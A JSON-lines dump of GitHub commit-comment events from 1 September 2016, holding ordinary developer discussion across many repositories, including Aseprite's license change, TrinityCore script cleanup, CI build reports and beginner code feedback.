{"id":"4503454259","type":"CommitCommentEvent","actor":{"login":"JeromeMartinez"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865924,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:52:36Z","updated_at":"2016-09-01T15:52:36Z","body":"> Did you have them all assign copyright to you for their changes, or remove their changes, before attempting to change the license?\r\n\r\nTrusting [this comment](https://github.com/aseprite-gpl/aseprite/issues/1#issuecomment-243867112), there was a CLA so that's legal."}},"created_at":"2016-09-01T15:52:36Z"}
{"id":"4503456892","type":"CommitCommentEvent","actor":{"login":"SourceCodeLab"},"repo":{"name":"SourceCodeLab/IT2320"},"payload":{"comment":{"id":18865929,"position":4,"line":15,"path":"ConsoleApplication1/ConsoleApplication1/Program.cs","commit_id":"08cc6c75c704e2e5d295280075e3d42af6b3be34","created_at":"2016-09-01T15:53:03Z","updated_at":"2016-09-01T15:53:03Z","body":"deleted"}},"created_at":"2016-09-01T15:53:03Z"}
{"id":"4503458151","type":"CommitCommentEvent","actor":{"login":"sellout"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18865930,"position":71,"line":71,"path":"core/src/test/scala/quasar/std/StdLibSpec.scala","commit_id":"df848119c376d80a427b5a68237ae96980886147","created_at":"2016-09-01T15:53:18Z","updated_at":"2016-09-01T15:53:18Z","body":"So, my vision for the stdlib is like this –\r\n\r\nFirst, separate out all the SQL stuff. The `sql` package should have a mapping from its function names to StdLib functions. That mapping shouldn’t be embedded in the Func definitions.\r\n\r\nUnify StdLib and MapFunc, which means making a MapFunc coproduct – the current MapFunc is the component that contains all the mapping-level functions, with probably a few extracted to their own component as “internal” functions (i.e., only generated during QScript compilation). Then the other things – Expansion/Transformation/etc. live in a distinct component (or components) that doesn’t survive the conversion to QScript.\r\n\r\nAnd LP _also_ becomes a coproduct, with `Constant` in its own component. Then frontends can compile to `EJson :+: LogicalPlan`, which we then convert to `Constant :+: LogicalPlan` (which extracts interleaved literals into the Constant node – which now contains EJson instead of Data).\r\n\r\nThoughts?"}},"created_at":"2016-09-01T15:53:18Z"}
{"id":"4503459916","type":"CommitCommentEvent","actor":{"login":"SourceCodeLab"},"repo":{"name":"SourceCodeLab/IT2320"},"payload":{"comment":{"id":18865934,"position":4,"line":15,"path":"ConsoleApplication1/ConsoleApplication1/Program.cs","commit_id":"08cc6c75c704e2e5d295280075e3d42af6b3be34","created_at":"2016-09-01T15:53:34Z","updated_at":"2016-09-01T15:53:34Z","body":"Console.WriteLine();"}},"created_at":"2016-09-01T15:53:34Z"}
{"id":"4503463393","type":"CommitCommentEvent","actor":{"login":"moldcraft"},"repo":{"name":"ThemeFuse/Unyson-PageBuilder-Extension"},"payload":{"comment":{"id":18865945,"position":null,"line":null,"path":null,"commit_id":"cd32bc77f32ee0516d3f49321561dc51cad79f42","created_at":"2016-09-01T15:54:07Z","updated_at":"2016-09-01T15:54:07Z","body":"@andreiglingeanu No!"}},"created_at":"2016-09-01T15:54:07Z"}
{"id":"4503465237","type":"CommitCommentEvent","actor":{"login":"SourceCodeLab"},"repo":{"name":"SourceCodeLab/IT2320"},"payload":{"comment":{"id":18865950,"position":null,"line":null,"path":null,"commit_id":"08cc6c75c704e2e5d295280075e3d42af6b3be34","created_at":"2016-09-01T15:54:22Z","updated_at":"2016-09-01T15:54:22Z","body":"nice code"}},"created_at":"2016-09-01T15:54:22Z"}
{"id":"4503466768","type":"CommitCommentEvent","actor":{"login":"Dillybob92"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865954,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:54:36Z","updated_at":"2016-09-01T15:54:36Z","body":"@dacap Aww I was thinking of something else. I thought @akien-mga reply meant that maybe he was thinking about adding it to Godot as a editor/addon.\r\n\r\nMy bad :)\r\n\r\nI have no problem using this as a external tool. If I can legally use the exported frames that I create in commercial games...? I see no problem and appreciate it greatly."}},"created_at":"2016-09-01T15:54:36Z"}
{"id":"4503469245","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865960,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:54:58Z","updated_at":"2016-09-01T15:54:58Z","body":"That's right @JeromeMartinez and @gerrywastaken, the CLA was made to sublicense Aseprite (mainly to create an iOS version of Aseprite, which I've never started yet)."}},"created_at":"2016-09-01T15:54:58Z"}
{"id":"4503474671","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18865970,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T15:55:50Z","updated_at":"2016-09-01T15:55:50Z","body":"Nice simplification from 11 to 2 lines, I suppose the removed SAI did not work as intended?\r\n(comment content from the removed SAI below)\r\n```\r\nCabal Abjurist - Out of Combat - Disable Combat Movement\r\nCabal Abjurist - On Aggro - Cast 'Arcane Missiles' (No Repeat)\r\nCabal Abjurist - On Aggro - Increment Phase By 1 (No Repeat)\r\nCabal Abjurist - Within 0-40 Range - Cast 'Arcane Missiles' (No Repeat)\r\nCabal Abjurist - Between 0-15% Mana - Enable Combat Movement (Phase 1) (No Repeat)\r\nCabal Abjurist - Between 0-15% Mana - Increment Phase By 1 (Phase 1) (No Repeat)\r\nCabal Abjurist - Within 35-80 Range - Enable Combat Movement (Phase 1) (No Repeat)\r\nCabal Abjurist - Within 5-15 Range - Disable Combat Movement (Phase 1) (No Repeat)\r\nCabal Abjurist - Within 0-5 Range - Enable Combat Movement (Phase 1) (No Repeat)\r\nCabal Abjurist - Between 30-100% Mana - Decrement Phase By 1 (Phase 1) (No Repeat)\r\nCabal Abjurist - In Combat - Cast 'Frost Nova' (Phase 1) (No Repeat)\r\n```"}},"created_at":"2016-09-01T15:55:50Z"}
{"id":"4503477332","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865972,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:56:15Z","updated_at":"2016-09-01T15:56:15Z","body":"> I have no problem using this as a external tool. If I can legally use the exported frames that I create in commercial games...? I see no problem and appreciate it greatly.\r\n\r\nYes you can @Dillybob92 "}},"created_at":"2016-09-01T15:56:15Z"}
{"id":"4503480138","type":"CommitCommentEvent","actor":{"login":"bonkey"},"repo":{"name":"codecov/codecov-bash"},"payload":{"comment":{"id":18865989,"position":6,"line":444,"path":"codecov","commit_id":"51bbb4bf8b6ee69348d45d37de2c47e48c9b3e26","created_at":"2016-09-01T15:56:41Z","updated_at":"2016-09-01T15:56:41Z","body":"Help for help @stevepeak. My pleasure :-)"}},"created_at":"2016-09-01T15:56:41Z"}
{"id":"4503486163","type":"CommitCommentEvent","actor":{"login":"arianadziedzic"},"repo":{"name":"arianadziedzic/pickUpSticks"},"payload":{"comment":{"id":18866005,"position":null,"line":null,"path":null,"commit_id":"bad36ab67fc0094e154039a6626cd81ddb259305","created_at":"2016-09-01T15:57:43Z","updated_at":"2016-09-01T15:57:43Z","body":"Your enthusiasm gets me amped! enthusiasm +5 for you :)\n\nJust pushed the initial framework and attached is a picture of some\nwhiteboard work I tackled yesterday (I went straight up A Beautiful Mind on\nthat wall...). Now just starting small trying to get two things to move\ntowards one another using a navigation.\n\nThanks for all your help Andrew!\n\nOn Thu, Sep 1, 2016 at 11:18 AM, Andrew <notifications@github.com> wrote:\n\n> That's a great process. Forget my comment! I just wanted to dive in.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arianadziedzic/pickUpSticks/commit/bad36ab67fc0094e154039a6626cd81ddb259305#commitcomment-18865400>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATOWCsyntpP2QYXZuUQEPlzhyGgN5fMMks5qluzbgaJpZM4Jyyrk>\n> .\n>\n"}},"created_at":"2016-09-01T15:57:43Z"}
{"id":"4503486354","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18866007,"position":null,"line":null,"path":null,"commit_id":"eb846662dca2d670285c4760e21a80b11b04f9ca","created_at":"2016-09-01T15:57:45Z","updated_at":"2016-09-01T15:57:45Z","body":"Fix sync @HridayHS \r\nLine No 26 \r\nit is\r\n<project path=\"system/sepolicy\" name=\"platform/system/sepolicy\" groups=\"pdk\" remote=\"yu-aosp-n\" />\r\n\r\nis shld be\r\n<project path=\"system/sepolicy\" name=\"platform_system_sepolicy\" groups=\"pdk\" remote=\"yu-aosp-n\" />"}},"created_at":"2016-09-01T15:57:45Z"}
{"id":"4503486599","type":"CommitCommentEvent","actor":{"login":"chirimoya"},"repo":{"name":"sulu/sulu"},"payload":{"comment":{"id":18866008,"position":14,"line":83,"path":"src/Sulu/Bundle/CategoryBundle/Twig/CategoryTwigExtension.php","commit_id":"b918fa84415890859a45de46ff1884c27aa02695","created_at":"2016-09-01T15:57:47Z","updated_at":"2016-09-01T15:57:47Z","body":"@nnatter ... public API changed! Need to be fixed in a more elegant way."}},"created_at":"2016-09-01T15:57:47Z"}
{"id":"4503486691","type":"CommitCommentEvent","actor":{"login":"pete0emerson"},"repo":{"name":"pete0emerson/hello_world"},"payload":{"comment":{"id":18866010,"position":null,"line":null,"path":null,"commit_id":"9a01d197058a1905424c33858f017ed6dafed464","created_at":"2016-09-01T15:57:49Z","updated_at":"2016-09-01T15:57:49Z","body":"Insert comment here"}},"created_at":"2016-09-01T15:57:49Z"}
{"id":"4503486824","type":"CommitCommentEvent","actor":{"login":"bradfrost"},"repo":{"name":"bradfrost/atomic-design"},"payload":{"comment":{"id":18866012,"position":56,"line":225,"path":"chapter-1.md","commit_id":"24197ac0c3889e59d58ec42025fadc1dff3934d3","created_at":"2016-09-01T15:57:50Z","updated_at":"2016-09-01T15:57:50Z","body":"@FullCreamMilkMan Lowercase it is!"}},"created_at":"2016-09-01T15:57:50Z"}
{"id":"4503487062","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866013,"position":null,"line":null,"path":null,"commit_id":"eecdae8d35b42343e03d9917469fb18acef5c207","created_at":"2016-09-01T15:57:52Z","updated_at":"2016-09-01T15:57:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 896](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12281&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:45\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T15:57:52Z"}
{"id":"4503488392","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18866014,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T15:58:06Z","updated_at":"2016-09-01T15:58:06Z","body":"So, something like this in `condaforge.yml`?\r\n```\r\nchannels:\r\n  targets:\r\n    - channel_to_upload\r\n```\r\n\r\nAnd, then, we `rerender` again? Or, is the recipe rady to run with this addition to `conda-forge.yml`?"}},"created_at":"2016-09-01T15:58:06Z"}
{"id":"4503491256","type":"CommitCommentEvent","actor":{"login":"lexieheinle"},"repo":{"name":"lexieheinle/dailygraphics"},"payload":{"comment":{"id":18866022,"position":null,"line":null,"path":null,"commit_id":"18961b64cc23c9e2082d0230599befe5a6bc0df1","created_at":"2016-09-01T15:58:32Z","updated_at":"2016-09-01T15:58:32Z","body":"#3 completed"}},"created_at":"2016-09-01T15:58:32Z"}
{"id":"4503499554","type":"CommitCommentEvent","actor":{"login":"MartelliEnrico"},"repo":{"name":"mellotanica/uARM"},"payload":{"comment":{"id":18866045,"position":null,"line":null,"path":null,"commit_id":"8b10fc0270ea1e5272990003a0cedc011a8a2722","created_at":"2016-09-01T15:59:59Z","updated_at":"2016-09-01T15:59:59Z","body":"Ah, I just saw the change of directory for the build. Yeah, that will prevent the conflict."}},"created_at":"2016-09-01T15:59:59Z"}
{"id":"4503499974","type":"CommitCommentEvent","actor":{"login":"MoonBrew"},"repo":{"name":"MoonBrew/genesis"},"payload":{"comment":{"id":18866051,"position":null,"line":null,"path":null,"commit_id":"f1ed2ce71153b3ab4504885507aa316f081d5748","created_at":"2016-09-01T16:00:04Z","updated_at":"2016-09-01T16:00:04Z","body":"Batsman.java line 29.\r\n\r\nhttp://docs.oracle.com/javase/tutorial/java/nutsandbolts/datatypes.html\r\n\r\n\"Local variables are slightly different; the compiler never assigns a default value to an uninitialized local variable. If you cannot initialize your local variable where it is declared, make sure to assign it a value before you attempt to use it. Accessing an uninitialized local variable will result in a compile-time error.\""}},"created_at":"2016-09-01T16:00:04Z"}
{"id":"4503501180","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866055,"position":null,"line":null,"path":null,"commit_id":"4fcb6b36ced4f05a489da14748c909a7d417be50","created_at":"2016-09-01T16:00:17Z","updated_at":"2016-09-01T16:00:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 897](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12289&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T16:00:17Z"}
{"id":"4503504260","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866061,"position":null,"line":null,"path":null,"commit_id":"4fcb6b36ced4f05a489da14748c909a7d417be50","created_at":"2016-09-01T16:00:45Z","updated_at":"2016-09-01T16:00:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 897](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12289&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:00:28"}},"created_at":"2016-09-01T16:00:45Z"}
{"id":"4503505607","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866064,"position":null,"line":null,"path":null,"commit_id":"4c0f5a2fdce3b78fed7bcb41d5cb586aceca472d","created_at":"2016-09-01T16:00:58Z","updated_at":"2016-09-01T16:00:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 898](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12292&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T16:00:58Z"}
{"id":"4503506534","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18866067,"position":null,"line":null,"path":null,"commit_id":"8b64474d4ad7adb75b99ec096e7e2e5ae699130c","created_at":"2016-09-01T16:01:08Z","updated_at":"2016-09-01T16:01:08Z","body":"...as it evolves away from the original codebase.  \r\nWorded much better as well, of course.  :+1: "}},"created_at":"2016-09-01T16:01:08Z"}
{"id":"4503507216","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18866071,"position":null,"line":null,"path":null,"commit_id":"e84317fc9cef01502e5a32a944cf1c22969ded33","created_at":"2016-09-01T16:01:14Z","updated_at":"2016-09-01T16:01:14Z","body":"Add bound checks, so it won't say \"YOU GOT OUT OF THE MATRIX!!!!\"\r\n"}},"created_at":"2016-09-01T16:01:14Z"}
{"id":"4503507346","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18866074,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-01T16:01:15Z","updated_at":"2016-09-01T16:01:15Z","body":"что значит \"не хочет работать\"?\r\nприведи примеры ввода, ожидаемого и фактического вывода."}},"created_at":"2016-09-01T16:01:15Z"}
{"id":"4503513814","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18866092,"position":null,"line":null,"path":null,"commit_id":"e84317fc9cef01502e5a32a944cf1c22969ded33","created_at":"2016-09-01T16:02:21Z","updated_at":"2016-09-01T16:02:21Z","body":"And add a constant looping of the battle system, rather than having one command then stopping."}},"created_at":"2016-09-01T16:02:21Z"}
{"id":"4503517424","type":"CommitCommentEvent","actor":{"login":"steniente"},"repo":{"name":"steniente/hello-world"},"payload":{"comment":{"id":18866101,"position":null,"line":null,"path":null,"commit_id":"da68decfea2eb1bc01246c87fbaec0251f938350","created_at":"2016-09-01T16:02:56Z","updated_at":"2016-09-01T16:02:56Z","body":"Wait I'm not done yet! I need to add more code from a Git client using my Mac desktop. I have can choose from:   Github desktop or Sourcetree\r\n\r\nI will also add my source files to bitbucket.com"}},"created_at":"2016-09-01T16:02:56Z"}
{"id":"4503518291","type":"CommitCommentEvent","actor":{"login":"EddyJo"},"repo":{"name":"EddyJo/YEASTSoft-Java-jsp"},"payload":{"comment":{"id":18866110,"position":null,"line":null,"path":null,"commit_id":"cd780f65bbbab496dbc1a99c530e6c97ea6ed2fa","created_at":"2016-09-01T16:03:06Z","updated_at":"2016-09-01T16:03:06Z","body":"sum에 10을 더해봄\r\n어때?"}},"created_at":"2016-09-01T16:03:06Z"}
{"id":"4503525313","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18866126,"position":null,"line":null,"path":null,"commit_id":"8bcaee4f51a7842e76aceb87e2c073fd7988152a","created_at":"2016-09-01T16:04:18Z","updated_at":"2016-09-01T16:04:18Z","body":"No. Just no.\r\nFor three reasons:\r\nOne, the non-ASCII characters.\r\nAnd two, typing it in manually in the calculator.\r\nAnd three, JUST NO. We should actually wait until we GET to the next text adventure."}},"created_at":"2016-09-01T16:04:18Z"}
{"id":"4503528058","type":"CommitCommentEvent","actor":{"login":"rpsenski"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":18866133,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-01T16:04:43Z","updated_at":"2016-09-01T16:04:43Z","body":"I noticed you have \"X-HTTP-Method\":\"MERGE\" in your header. Is this intentional? This should be a pure POST as you're invoking a method, not patching/merging property changes. Try again without this. I confirmed that the string I recommended above works. \r\n\r\nCheers,\r\nRyan"}},"created_at":"2016-09-01T16:04:43Z"}
{"id":"4503528296","type":"CommitCommentEvent","actor":{"login":"galambjozsef"},"repo":{"name":"Polprzewodnikowy/KorgPaOsUnpacker"},"payload":{"comment":{"id":18866136,"position":null,"line":null,"path":null,"commit_id":"6e1848533c7de9c0aee96c837848deae77c9583c","created_at":"2016-09-01T16:04:44Z","updated_at":"2016-09-01T16:04:44Z","body":"Hi. Korg pa BKP, PCG file can be opened in the same way?"}},"created_at":"2016-09-01T16:04:44Z"}
{"id":"4503531242","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18866144,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T16:05:13Z","updated_at":"2016-09-01T16:05:13Z","body":"develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (2081 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-85.01%25-red.svg)</a> \n"}},"created_at":"2016-09-01T16:05:13Z"}
{"id":"4503535473","type":"CommitCommentEvent","actor":{"login":"flowlo"},"repo":{"name":"GGfrerer/boogle"},"payload":{"comment":{"id":18866160,"position":null,"line":null,"path":null,"commit_id":"0f9eb354a436da58a93eeb1fce2e700c9e9018a5","created_at":"2016-09-01T16:05:55Z","updated_at":"2016-09-01T16:05:55Z","body":":sparkles: "}},"created_at":"2016-09-01T16:05:55Z"}
{"id":"4503535475","type":"CommitCommentEvent","actor":{"login":"FredLunnon"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18866159,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-01T16:05:55Z","updated_at":"2016-09-01T16:05:55Z","body":"  I opened my local  <__init.py__>   in  <textedit>  then re-saved and pushed\nto my repo.  Tellingly, the repo now displays it in a different font.\n\n  Try pulling again, and see what happens; if still kaput, I'll try\nediting directly\ninto the repo, as suggested.  [ It's not rocket science.  Or is it? ]\n\n  Re  <issues>  ---  ahah, so I have to try that in the upstream repo.  Willco.\n\nWFL\n\n\n\n\n\nOn 9/1/16, Mike Boyle <notifications@github.com> wrote:\n> Fred, this result isn't typical.  I've never seen anything like this, even\n> when using Xcode myself.  If you look at [your own copy of the\n> repository](https://github.com/FredLunnon/clifford), you can click on the\n> \"Latest commit\" to see the [changes that you\n> made](https://github.com/FredLunnon/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5).\n>  Github shows that it's just some weird binary file, which is not what\n> `__init__.py` should be; it should just be a plain text file.  So Xcode must\n> be screwing something up for you.  Maybe it would be easier to edit directly\n> on github.com.\n>\n> Also, I think arsenovic is saying that it's better to report bugs by\n> clicking on [\"Issues\"](https://github.com/arsenovic/clifford/issues) in\n> *his* copy of the repository, clicking the \"New issue\" button, and writing\n> your bug report there.  Usually, it's one issue for each bug, but if they're\n> small or closely related you might combine them into a single issue.\n>\n> Github and git are actually really great tools, if you just put in a little\n> bit of time learning how to use them.  I know that it's easy to go wrong.\n> (E.g., I think Brombo's main problem is that he simply doesn't `git pull`\n> new pull requests to his own repo before he starts in on new edits, or `git\n> push` before he merges a new pull request.)  And once you've gone wrong,\n> it's not obvious how to straighten out.  But if you follow the directions,\n> these tools really are simple.  There are lots of tutorials (including\n> videos) if you google for them.\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/arsenovic/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5#commitcomment-18865464\n"}},"created_at":"2016-09-01T16:05:55Z"}
{"id":"4503537225","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18866165,"position":null,"line":null,"path":null,"commit_id":"e84317fc9cef01502e5a32a944cf1c22969ded33","created_at":"2016-09-01T16:06:15Z","updated_at":"2016-09-01T16:06:15Z","body":"And it compiles now."}},"created_at":"2016-09-01T16:06:15Z"}
{"id":"4503539350","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18866171,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T16:06:35Z","updated_at":"2016-09-01T16:06:35Z","body":"No, it made the mob stand there and do nothing.\r\n\r\nThese sort of Phase hacks are typically implementations from before `SMARTCAST_COMBAT_MOVE` was added, trying to work around combat movement mechanics in very overcomplicated ways."}},"created_at":"2016-09-01T16:06:35Z"}
{"id":"4503545527","type":"CommitCommentEvent","actor":{"login":"sagarshah1729"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18866193,"position":null,"line":null,"path":null,"commit_id":"eb846662dca2d670285c4760e21a80b11b04f9ca","created_at":"2016-09-01T16:07:42Z","updated_at":"2016-09-01T16:07:42Z","body":"Noted..Will fix it now..:)"}},"created_at":"2016-09-01T16:07:42Z"}
{"id":"4503553126","type":"CommitCommentEvent","actor":{"login":"rpsenski"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":18866207,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-01T16:09:01Z","updated_at":"2016-09-01T16:09:01Z","body":"I want to add that in order to include the __metadata that I originally advised against removing, you simply need the ContentType in the header to be application/json;odata=verbose\r\n\r\nthe odata=verbose is key."}},"created_at":"2016-09-01T16:09:01Z"}
{"id":"4503555191","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18866212,"position":null,"line":null,"path":null,"commit_id":"8b64474d4ad7adb75b99ec096e7e2e5ae699130c","created_at":"2016-09-01T16:09:25Z","updated_at":"2016-09-01T16:09:25Z","body":"Well, it was this or \"spoon\"..."}},"created_at":"2016-09-01T16:09:25Z"}
{"id":"4503555420","type":"CommitCommentEvent","actor":{"login":"khabbazian"},"repo":{"name":"khabbazian/l1ou"},"payload":{"comment":{"id":18866213,"position":14,"line":104,"path":"R/convergent_regions.R","commit_id":"fce295c42cd22228bcb7201f7b67839283954a40","created_at":"2016-09-01T16:09:28Z","updated_at":"2016-09-01T16:09:28Z","body":"Thanks so much for the explanation. Since I wasn't sure about it I didn't change it to  \" k = nShifts+1 \" and it is \"p <- nShifts + (nShiftVals + 3)*ncol(Y)\" as you suggested. \r\n\r\nWould it be okay if I mention this difference in the document or the readme file? Just in case someone compares these two scores and wonder why they are different. \r\n\r\nThat's a great point. I have many impulsive commits in there without appropriate comments.  I will do that for the future commits.   --Thank you.\r\n\r\n\r\n"}},"created_at":"2016-09-01T16:09:28Z"}
{"id":"4503556235","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18866214,"position":null,"line":null,"path":null,"commit_id":"4c0f5a2fdce3b78fed7bcb41d5cb586aceca472d","created_at":"2016-09-01T16:09:36Z","updated_at":"2016-09-01T16:09:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 898](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12292&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:08:38"}},"created_at":"2016-09-01T16:09:36Z"}
{"id":"4503557300","type":"CommitCommentEvent","actor":{"login":"joshlw04"},"repo":{"name":"joshlw04/battleship"},"payload":{"comment":{"id":18866216,"position":3,"line":3,"path":"JS/Cell.js","commit_id":"688866d5c776b49b27ad9f0d0e16ca4379217369","created_at":"2016-09-01T16:09:48Z","updated_at":"2016-09-01T16:09:48Z","body":"for the most part, yes. I'm stuck on how to implement making an array from the new Cell class, so that I can pass those parameters in... Im assuming that should be my next step. "}},"created_at":"2016-09-01T16:09:48Z"}
{"id":"4503558867","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18866221,"position":null,"line":null,"path":null,"commit_id":"44e9cdbf190743ca351539f3eacd013dd0a352d5","created_at":"2016-09-01T16:10:06Z","updated_at":"2016-09-01T16:10:06Z","body":"@MichaelWallace30 \r\nWhat is the messageID for? And why is the user specifying it?"}},"created_at":"2016-09-01T16:10:06Z"}
{"id":"4503561225","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18866226,"position":null,"line":null,"path":null,"commit_id":"c3f81c527ddb5153f5a1eceb5e87efeb533129b0","created_at":"2016-09-01T16:10:28Z","updated_at":"2016-09-01T16:10:28Z","body":"working before your migration, no after...\r\nI agree it's not ideal but we did not figure a better (working) way than restoring the original code.\r\nlet's discuss it tomorrow."}},"created_at":"2016-09-01T16:10:28Z"}
{"id":"4503565088","type":"CommitCommentEvent","actor":{"login":"starthemoon"},"repo":{"name":"starthemoon/hello-world"},"payload":{"comment":{"id":18866237,"position":null,"line":null,"path":null,"commit_id":"6017d3f8ddb130949db1274682f87a522bafa2b9","created_at":"2016-09-01T16:11:12Z","updated_at":"2016-09-01T16:11:12Z","body":"ok, that is a start star on my way."}},"created_at":"2016-09-01T16:11:12Z"}
{"id":"4503569839","type":"CommitCommentEvent","actor":{"login":"maorninja"},"repo":{"name":"phase/Blargboard"},"payload":{"comment":{"id":18866251,"position":null,"line":null,"path":null,"commit_id":"8d380acf6c85017d3e6d31fe3884e26397f58f9f","created_at":"2016-09-01T16:12:01Z","updated_at":"2016-09-01T16:12:01Z","body":"What is the bug?  Is it fixed on BB 1.2?"}},"created_at":"2016-09-01T16:12:01Z"}
{"id":"4503570944","type":"CommitCommentEvent","actor":{"login":"noobName"},"repo":{"name":"noobName/onlineStore"},"payload":{"comment":{"id":18866257,"position":null,"line":null,"path":null,"commit_id":"f6ffdeee07103adb84f7be3534cfac769323cf40","created_at":"2016-09-01T16:12:14Z","updated_at":"2016-09-01T16:12:14Z","body":"my comimit"}},"created_at":"2016-09-01T16:12:14Z"}
